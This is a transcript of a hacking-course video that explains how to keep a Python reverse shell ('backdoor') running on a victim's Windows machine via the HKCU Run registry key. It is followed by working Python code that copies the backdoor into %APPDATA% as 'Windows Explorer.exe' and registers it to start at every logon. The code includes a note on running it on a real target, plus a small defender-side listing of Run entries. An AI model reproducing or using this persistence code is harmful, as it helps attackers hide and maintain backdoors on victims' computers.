1 00:00:00,270 --> 00:00:00,950 Hello everybody. 2 00:00:00,990 --> 00:00:02,280 And welcome back. 3 00:00:02,280 --> 00:00:08,880 And right now let's see how we can perform the persistence function, or persistence option, for our reverse 4 00:00:08,880 --> 00:00:09,690 shell. 5 00:00:09,690 --> 00:00:13,290 So first of all let me just exit the shell from our previous video. 6 00:00:14,250 --> 00:00:16,540 We have our shell right here. 7 00:00:16,560 --> 00:00:22,800 We can delete this shell since we will use another one after we compile it. 8 00:00:22,820 --> 00:00:25,410 Let me just delete this. 9 00:00:25,550 --> 00:00:25,850 OK. 10 00:00:25,850 --> 00:00:26,750 Doesn't want to delete. 11 00:00:26,750 --> 00:00:26,950 Yes. 12 00:00:26,980 --> 00:00:29,620 So it will be deleted in just a few seconds. 13 00:00:29,720 --> 00:00:35,930 And right now what we want to do is we want to open our reverse.shell, pardon me, reverse_ 14 00:00:35,930 --> 00:00:37,590 shell.py. 15 00:00:37,700 --> 00:00:40,030 Here we have everything we need from now on. 16 00:00:40,070 --> 00:00:46,850 And what we want to do right now is code the part where we will actually perform the persistence on the 17 00:00:46,850 --> 00:00:48,340 target system. 18 00:00:48,350 --> 00:00:54,440 Now before we do that I want to introduce you to a certain part of Windows called the registry. 19 00:00:54,440 --> 00:01:03,740 Now you can enter the registry in Windows by going to the search bar, typing in Run, opening the Run application 20 00:01:04,010 --> 00:01:06,710 and typing regedit into the Run application. 21 00:01:06,860 --> 00:01:12,150 Once you type regedit you can click OK; it will prompt you for the administrator password, 22 00:01:12,380 --> 00:01:14,740 since you're entering the Registry Editor. 23 00:01:14,930 --> 00:01:15,870 If you specify 24 00:01:15,890 --> 00:01:22,520 yes, it will open up your registry. As we can see, the registry is basically the heart of Windows. 
25 00:01:22,640 --> 00:01:29,820 Here we can actually create a registry key which will actually run our target, or pardon me, our backdoor 26 00:01:29,840 --> 00:01:34,240 on the target every time the target boots up. 27 00:01:34,250 --> 00:01:39,830 So what we want to do first of all is go to that, and it looks like this. 28 00:01:39,830 --> 00:01:44,570 This is something that you will probably see once you open the registry for the first time. 29 00:01:44,780 --> 00:01:50,330 So we can see these five registry directories; we are currently interested in these two right here. 30 00:01:50,330 --> 00:01:52,720 One of them is HKEY_CURRENT_USER 31 00:01:52,730 --> 00:01:55,310 and the other one is HKEY_LOCAL_MACHINE. 32 00:01:55,610 --> 00:02:04,010 Now, while they will both be performing the same function for us, if we go to HKEY_CURRENT_USER and 33 00:02:04,010 --> 00:02:10,700 make a registry key for our backdoor in that part, it will only run after the restart if the 34 00:02:10,940 --> 00:02:13,760 user logs into the same account. 35 00:02:13,760 --> 00:02:21,200 Now if we copy it into HKEY_LOCAL_MACHINE it will run our backdoor no matter which account the user 36 00:02:21,260 --> 00:02:30,070 logs into. For now, on our target, we will run this on a user account, and we do not have administrative 37 00:02:30,070 --> 00:02:36,370 privileges, so even if we add the function to copy it, or to make the registry key for our backdoor, in 38 00:02:36,370 --> 00:02:37,480 HKEY_LOCAL_MACHINE, 39 00:02:37,480 --> 00:02:41,840 we will not be able to do it since it requires administrative privileges. 40 00:02:41,950 --> 00:02:47,330 We can only make the persistence at the moment for our HKEY_CURRENT_USER. 41 00:02:47,350 --> 00:02:53,230 That means we can only make the persistence run after the user logs in to the same account. 42 00:02:53,230 --> 00:02:55,660 So we will do that for now. 
43 00:02:55,660 --> 00:02:59,830 If we go to HKEY_CURRENT_USER, just press the arrow right here. 44 00:02:59,980 --> 00:03:03,800 Go to Software; as we can see, you find Software right here. 45 00:03:03,820 --> 00:03:05,430 Press the arrow down there. 46 00:03:05,500 --> 00:03:12,160 Find Microsoft, press the arrow there as well, scroll down, and what you want to find is Windows, 47 00:03:12,220 --> 00:03:16,400 and in Windows you want to find CurrentVersion. So let me just show you how that looks. 48 00:03:16,420 --> 00:03:24,340 So you found Microsoft, you pressed the arrow, scrolled down to Windows right here, found Current 49 00:03:24,340 --> 00:03:33,430 Version, and you want to find the Run folder. Here are the registry keys for the files or programs 50 00:03:33,460 --> 00:03:40,220 that will run at startup, at the user logon. So we can see we already have some, such as CCleaner, 51 00:03:40,240 --> 00:03:46,140 OneDrive, Steam and other default applications that most of us have on our PC. 52 00:03:46,660 --> 00:03:53,110 Now this is also the part of the PC where most of the viruses and backdoors will be, if you have 53 00:03:53,110 --> 00:04:01,940 one, and this is also where we will actually install the registry key for our own backdoor. But we want 54 00:04:01,940 --> 00:04:10,850 to do a smart thing, which is actually copying our backdoor first to some other directory where 55 00:04:10,850 --> 00:04:17,580 the user won't find it, and then putting in the registry key to run the backdoor from that other directory. 56 00:04:17,600 --> 00:04:25,640 Because, for example, if the target closes our backdoor in the Task Manager, they can then delete the file 57 00:04:25,640 --> 00:04:26,350 simply. 58 00:04:26,480 --> 00:04:29,410 Now I'm not really sure why right now. 59 00:04:29,510 --> 00:04:31,200 Probably because I didn't close it. 60 00:04:31,230 --> 00:04:31,480 Good. 
61 00:04:31,510 --> 00:04:36,020 So let me just open my Task Manager so I can delete this reverse shell. 62 00:04:36,050 --> 00:04:41,690 Seems like the process is already running for some reason, which I'm not really sure why, but it doesn't 63 00:04:41,690 --> 00:04:47,930 really matter; we'll just find it right here, click End Task on it, and then we can delete 64 00:04:47,930 --> 00:04:48,200 it. 65 00:04:49,010 --> 00:04:51,830 And this is how the user will also be able to delete it. 66 00:04:52,340 --> 00:04:57,920 So we want to make sure to copy the reverse shell, right after they run it, into some different directory, 67 00:04:58,250 --> 00:05:01,730 and then we want to create the registry key for that different directory. 68 00:05:01,730 --> 00:05:04,460 As you can see, the registry key is something like this: 69 00:05:04,460 --> 00:05:07,650 you specify a name, and it will run whatever is set as 70 00:05:07,670 --> 00:05:10,160 the path to the program that you want to run. 71 00:05:10,190 --> 00:05:17,150 So for this program, for example, the path is the program path and then the .exe, 72 00:05:17,150 --> 00:05:19,290 the program that will run at startup 73 00:05:19,430 --> 00:05:28,460 every time I log into my Windows user account. So let's see how we can perform that. 74 00:05:28,790 --> 00:05:38,180 First of all, we want to import two different libraries for Python. One of them is the os library, 75 00:05:38,660 --> 00:05:44,980 which we will use for multiple things later on, and one of them is the sys library. 76 00:05:45,140 --> 00:05:50,460 Now I will show you how you can perform all of that in the next video. 77 00:05:50,460 --> 00:05:55,560 From now on I just wanted to explain what we will be doing, so that in the next video when we actually 78 00:05:55,560 --> 00:06:00,230 code all of this you don't get confused by what I am doing. 
79 00:06:00,230 --> 00:06:05,100 So in the next video I will also explain every step I do and what exactly that means. 80 00:06:05,100 --> 00:06:09,050 So I hope I see you in the next video. Take care, bye.
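Added example, not the lecture's own code: the HKCU Run persistence the video describes (copy the backdoor to a directory the user will not look in, then register that copy under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) written out in Python. The destination name "Windows Explorer.exe" and the value name "WindowsExplorer" are assumptions chosen for illustration; the course's own choices may differ. `reg add` is invoked through an injectable `run` callable so the copy-then-register logic can be exercised on any OS with a stub in place of reg.exe; `list_run_entries` is the defender's view of the same key and only works on Windows. Because the backdoor runs again at every logon, `persist` returns early when the hidden copy already exists rather than re-copying and re-adding the value each time.

```python
import os
import shutil
import subprocess
import tempfile

# Per-user autostart key from the lecture; writable without admin rights,
# unlike the HKLM equivalent, which needs elevation.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Assumed file name for the hidden copy (any name would work).
HIDDEN_NAME = "Windows Explorer.exe"


def reg_add_command(value_name, exe_path):
    """Build the 'reg add' argument list for one Run value.

    A list (not one shell string) means a path with spaces needs no manual
    quoting; /f overwrites an existing value without prompting.
    """
    return ["reg", "add", RUN_KEY, "/v", value_name,
            "/t", "REG_SZ", "/d", exe_path, "/f"]


def persist(source_exe, value_name="WindowsExplorer", appdata_dir=None,
            run=subprocess.call):
    """Copy the running backdoor into %APPDATA% and register it under HKCU Run.

    Returns the exit code of 'reg add', or None when the hidden copy already
    exists (the backdoor is started at every logon, so this keeps it from
    re-installing itself each time). 'run' is injectable for dry runs.
    """
    if appdata_dir is None:
        appdata_dir = os.environ.get("APPDATA", "")
    hidden_path = os.path.join(appdata_dir, HIDDEN_NAME)
    if os.path.exists(hidden_path):
        return None
    shutil.copyfile(source_exe, hidden_path)
    return run(reg_add_command(value_name, hidden_path))


def list_run_entries():
    """Defender view: (name, command) pairs under HKCU Run. Windows only."""
    import winreg  # only available on Windows
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once the values are exhausted
                break
            entries.append((name, data))
            index += 1
    return entries


def dry_run():
    """Exercise persist() in a temp dir with a recording stub instead of reg.exe."""
    calls = []

    def fake_reg(cmd):
        calls.append(cmd)
        return 0

    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for the compiled reverse_shell.exe.
        src = os.path.join(tmp, "reverse_shell.exe")
        with open(src, "wb") as handle:
            handle.write(b"MZ constructed stand-in, not a real PE")
        appdata = os.path.join(tmp, "AppData", "Roaming")
        os.makedirs(appdata)
        first = persist(src, appdata_dir=appdata, run=fake_reg)
        second = persist(src, appdata_dir=appdata, run=fake_reg)  # already installed
        copied = os.path.isfile(os.path.join(appdata, HIDDEN_NAME))
    return {"first": first, "second": second, "copied": copied, "calls": calls}


if __name__ == "__main__":
    print(dry_run())
```

On a real target the call would be `persist(sys.executable)` from the compiled backdoor, with `run` left at its default so reg.exe is actually executed. Anything written to this key shows up immediately in Task Manager's Startup tab, Sysinternals Autoruns and `list_run_entries()`, so the "smart thing" from the video only hides the file, not the autostart entry.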